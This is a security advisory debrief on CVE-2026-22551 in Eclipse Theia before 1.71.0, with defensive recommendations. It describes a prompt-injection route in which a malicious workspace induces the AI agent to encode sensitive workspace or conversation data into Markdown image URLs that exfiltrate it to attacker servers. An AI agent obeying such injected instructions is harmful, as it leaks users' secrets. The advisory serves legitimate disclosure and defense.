CVE-2026-22551 Eclipse Foundation CVE debrief

Who should care

Developers and users of Eclipse Theia versions prior to 1.71.0 should be aware of this vulnerability and take necessary precautions to prevent exploitation. This includes updating to the latest version and being cautious when working with AI features in untrusted workspaces.

Technical summary

The vulnerability in Eclipse Theia versions prior to 1.71.0 allows attackers to trigger HTTP requests to arbitrary external URLs without restriction by rendering Markdown image tags from AI responses. This can be combined with prompt injection in a malicious workspace to induce the AI agent to construct image URLs encoding sensitive information from the workspace or conversation context, exfiltrating it to attacker-controlled servers. The CVSS vector for this vulnerability is CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X.

Defensive priority

MEDIUM

Recommended defensive actions

• Update Eclipse Theia to version 1.71.0 or later
• Disable AI features in untrusted workspaces
• Be cautious when working with AI features in untrusted workspaces
• Monitor for suspicious activity in workspace and conversation context
• Implement additional security measures to prevent exfiltration of sensitive information

Evidence notes

The information provided is based on data from the NVD and CVE.org. The vulnerability was published on 2026-06-18T16:16:52.960Z and modified on 2026-06-18T17:16:29.797Z. The CVSS score and vector were provided by the NVD.

Official resources